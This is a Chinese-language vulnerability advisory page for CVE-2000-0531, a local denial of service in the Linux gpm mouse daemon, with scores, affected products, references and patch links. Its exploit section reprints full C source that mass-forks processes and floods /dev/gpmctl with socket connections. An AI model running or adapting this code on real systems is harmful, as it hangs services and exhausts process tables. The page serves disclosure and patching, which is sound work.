CVE-2000-0531
CVSS2.1
发布时间 :1999-11-23 00:00:00
修订时间 :2008-09-05 16:21:14
NMCOES    

[原文]Linux gpm program allows local users to cause a denial of service by flooding the /dev/gpmctl device with STREAM sockets.


[CNNVD]Linux gpm拒绝服务漏洞(CNNVD-199911-068)

        Linux gpm程序存在漏洞。本地用户可以利用具有STREAM套接字/dev/gpmctl设备导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:caldera:openlinux_eserver:2.3
cpe:/o:redhat:linux:6.1::i386
cpe:/o:redhat:linux:6.0::i386
cpe:/o:caldera:openlinux:2.4
cpe:/o:caldera:openlinux:2.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0531
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0531
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-068
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/5010.php
(VENDOR_ADVISORY)  XF  linux-gpm-gpmctl-dos
http://www.securityfocus.com/bid/1377
(VENDOR_ADVISORY)  BID  1377
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.10.10006201453090.1812-200000@apollo.aci.com.pl
(VENDOR_ADVISORY)  BUGTRAQ  20000620 Bug in gpm
http://www.redhat.com/support/errata/RHSA-2000-045.html
(UNKNOWN)  REDHAT  RHSA-2000:045
http://archives.neohapsis.com/archives/bugtraq/2000-07/0409.html
(UNKNOWN)  BUGTRAQ  20000728 MDKSA:2000-025 gpm update

- 漏洞信息

Linux gpm拒绝服务漏洞
低危 其他
1999-11-23 00:00:00 2006-09-05 00:00:00
本地  
        Linux gpm程序存在漏洞。本地用户可以利用具有STREAM套接字/dev/gpmctl设备导致服务拒绝。

- 公告与补丁

        This was patched in RedHat's "Rawhide" release and a fixed version of gpm is available at:
        ftp://ftp.redhat.com/pub/Linux/redhat-rawhide/i386/RedHat/RPMS/gpm-1.19.2-1.i386.rpm
        Updates for OpenLinux 2.3 and 2.4 are also available from Caldera.
        Caldera OpenLinux 2.3
        
        SCO eServer 2.3
        
        Caldera OpenLinux 2.4
        

- 漏洞信息 (20026)

OpenLinux 2.3/2.4,RedHat 6.0/6.1,SCO eServer 2.3 Denial of Service (EDBID:20026)
linux dos
1999-11-23 Verified
0 FuckGpm
N/A [点击下载]
source: http://www.securityfocus.com/bid/1377/info

gpm is a program that allows Linux users to use the mouse in virtual consoles. It communicates with a device, /dev/gpmctl, via unix domain STREAM sockets and is vulnerable to a locally exploitable denial of service attack. If a malicious user makes too many connections to the device, it will hang and gpm will not function. RedHat 6.1 is confirmed to be vulnerable. It is not known what other linux distributions may also be vulnerable. 

// FuckGpm    CADENCE of Lam3rZ    1999.11.23

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>

#define GDZIE    "/dev/gpmctl"
#define POLACZENIA 200
#define SHITY   10000


int main (void)
{
 int a,b;
 struct sockaddr_un sun;

 sun.sun_family = AF_UNIX;
 strncpy (sun.sun_path, GDZIE, 30);
 printf ("OK...\n");

 if (fork ())
  exit (0);

 for (b = 0; b < SHITY; b++)
  if (fork () == 0)
  break;

 for (b = 0; b < POLACZENIA; b++)
  {
   if ((a = socket (AF_UNIX, SOCK_STREAM, 0)) < 0)
    {
     perror ("socket");
     while (1);
   }

  if (connect (a, (struct sockaddr *) &sun, sizeof (struct sockaddr)) < 0)
   {
    perror ("connect");
    close (a);
    b--;
   }
  }

 while (1);
}
		

- 漏洞信息

13689
Linux gpm /dev/gpmctl STREAM Socket Saturation Local DoS
Local Access Required Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-07-20 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Linux gpm Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 1377
No Yes
1999-11-23 12:00:00 2009-07-11 02:56:00
Discovered by Tomasz Grabowski <cadence@apollo.aci.com.pl> and exploit/update posted to Bugtraq on June 20, 2000.

- 受影响的程序版本

SCO eServer 2.3
RedHat Linux 6.1 i386
RedHat Linux 6.0
Caldera OpenLinux 2.4
Caldera OpenLinux 2.3

- 漏洞讨论

gpm is a program that allows Linux users to use the mouse in virtual consoles. It communicates with a device, /dev/gpmctl, via unix domain STREAM sockets and is vulnerable to a locally exploitable denial of service attack. If a malicious user makes too many connections to the device, it will hang and gpm will not function. RedHat 6.1 is confirmed to be vulnerable. It is not known what other linux distributions may also be vulnerable.

- 漏洞利用

x

- 解决方案

This was patched in RedHat's "Rawhide" release and a fixed version of gpm is available at:

ftp://ftp.redhat.com/pub/Linux/redhat-rawhide/i386/RedHat/RPMS/gpm-1.19.2-1.i386.rpm

Updates for OpenLinux 2.3 and 2.4 are also available from Caldera.


Caldera OpenLinux 2.3

SCO eServer 2.3

Caldera OpenLinux 2.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站